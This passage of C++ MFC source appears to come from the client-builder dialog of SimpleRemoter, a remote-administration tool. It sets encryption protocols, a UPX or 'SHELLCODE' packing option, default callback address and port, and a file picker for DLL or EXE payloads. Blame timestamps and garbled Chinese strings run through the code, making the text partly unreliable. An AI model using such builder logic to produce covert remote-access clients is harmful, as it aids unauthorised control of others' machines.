m_ComboEncrypt.InsertString(PROTOCOL_HELL, "HELL");
|
|
|
|
|
|
m_ComboEncrypt.SetCurSel(PROTOCOL_SHINE);
|
|
|
|
|
|
|
2025-08-10 03:04:13 +08:00
|
|
|
|
m_ComboCompress.InsertString(CLIENT_COMPRESS_NONE, "<EFBFBD><EFBFBD>");
|
|
|
|
|
|
m_ComboCompress.InsertString(CLIENT_COMPRESS_UPX, "UPX");
|
2025-09-01 12:29:52 +08:00
|
|
|
|
m_ComboCompress.InsertString(CLIENT_COMPRESS_SC, "SHELLCODE");
|
2025-08-10 03:04:13 +08:00
|
|
|
|
m_ComboCompress.SetCurSel(CLIENT_COMPRESS_NONE);
|
|
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
m_OtherItem.ShowWindow(SW_HIDE);
|
2025-01-01 04:54:27 +08:00
|
|
|
|
|
2024-12-28 18:35:34 +08:00
|
|
|
|
return TRUE; // return TRUE unless you set the focus to a control
|
|
|
|
|
|
// <20>쳣: OCX <20><><EFBFBD><EFBFBD>ҳӦ<D2B3><D3A6><EFBFBD><EFBFBD> FALSE
|
|
|
|
|
|
}
|
2025-01-01 04:54:27 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
void CBuildDlg::OnCbnSelchangeComboExe()
|
|
|
|
|
|
{
|
|
|
|
|
|
auto n = m_ComboExe.GetCurSel();
|
|
|
|
|
|
if (n == OTHER_ITEM)
|
|
|
|
|
|
{
|
|
|
|
|
|
CComPtr<IShellFolder> spDesktop;
|
|
|
|
|
|
HRESULT hr = SHGetDesktopFolder(&spDesktop);
|
|
|
|
|
|
if (FAILED(hr)) {
|
2025-06-21 14:27:21 +08:00
|
|
|
|
MessageBox("Explorer δ<><CEB4>ȷ<EFBFBD><C8B7>ʼ<EFBFBD><CABC>! <20><><EFBFBD>Ժ<EFBFBD><D4BA><EFBFBD><EFBFBD>ԡ<EFBFBD>", "<EFBFBD><EFBFBD>ʾ");
|
2025-04-07 18:18:36 +08:00
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ<EFBFBD><CABE><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ض<EFBFBD><D8B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ı<EFBFBD><C4B1>ļ<EFBFBD><C4BC><EFBFBD>
|
|
|
|
|
|
CFileDialog fileDlg(TRUE, _T("dll"), NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
|
|
|
|
|
|
_T("All Files (*.*)|*.*|DLL Files (*.dll)|*.dll|EXE Files (*.exe)|*.exe|"), AfxGetMainWnd());
|
|
|
|
|
|
int ret = 0;
|
|
|
|
|
|
try {
|
|
|
|
|
|
ret = fileDlg.DoModal();
|
|
|
|
|
|
}
|
|
|
|
|
|
catch (...) {
|
2025-06-21 14:27:21 +08:00
|
|
|
|
MessageBox("<EFBFBD>ļ<EFBFBD><EFBFBD>Ի<EFBFBD><EFBFBD><EFBFBD>δ<EFBFBD>ɹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD>Ժ<EFBFBD><D4BA><EFBFBD><EFBFBD>ԡ<EFBFBD>", "<EFBFBD><EFBFBD>ʾ");
|
2025-04-07 18:18:36 +08:00
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
if (ret == IDOK)
|
|
|
|
|
|
{
|
|
|
|
|
|
CString name = fileDlg.GetPathName();
|
|
|
|
|
|
|
|
|
|
|
|
m_OtherItem.SetWindowTextA(name);
|
|
|
|
|
|
CFile File;
|
|
|
|
|
|
BOOL ret = File.Open(name, CFile::modeRead | CFile::typeBinary);
|
|
|
|
|
|
if (ret) {
|
|
|
|
|
|
int dwFileSize = File.GetLength();
|
|
|
|
|
|
LPBYTE szBuffer = new BYTE[dwFileSize];
|
|
|
|
|
|
File.Read(szBuffer, dwFileSize);
|
|
|
|
|
|
File.Close();
|
|
|
|
|
|
m_strIP = "127.0.0.1";
|
|
|
|
|
|
m_strPort = "6543";
|
|
|
|
|
|
UpdateData(FALSE);
|
|
|
|
|
|
SAFE_DELETE_ARRAY(szBuffer);
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
else {
|
|
|
|
|
|
m_OtherItem.SetWindowTextA("δѡ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>");
|
|
|
|
|
|
}
|
|
|
|
|
|
m_OtherItem.ShowWindow(SW_SHOW);
|
|
|
|
|
|
}
|
|
|
|
|
|
else {
|
|
|
|
|
|
m_OtherItem.SetWindowTextA("");
|
|
|
|
|
|
m_OtherItem.ShowWindow(SW_HIDE);
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
2025-07-13 03:55:33 +08:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
void CBuildDlg::OnHelpParameters()
|
|
|
|
|
|
{
|
|
|
|
|
|
CString url = _T("https://github.com/yuanyuanxiang/SimpleRemoter/wiki#<23><><EFBFBD>ɲ<EFBFBD><C9B2><EFBFBD>");
|
|
|
|
|
|
ShellExecute(NULL, _T("open"), url, NULL, NULL, SW_SHOWNORMAL);
|
|
|
|
|
|
}
|
2025-08-29 06:57:59 +08:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
void CBuildDlg::OnHelpFindden()
|
|
|
|
|
|
{
|
|
|
|
|
|
CInputDialog dlg(this);
|
|
|
|
|
|
dlg.m_str = m_strFindden;
|
|
|
|
|
|
dlg.Init("<EFBFBD><EFBFBD><EFBFBD>ɱ<EFBFBD>ʶ", "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ñ<EFBFBD>ʶ<EFBFBD><EFBFBD>Ϣ:");
|
|
|
|
|
|
if (dlg.DoModal() == IDOK) {
|
|
|
|
|
|
m_strFindden = dlg.m_str;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|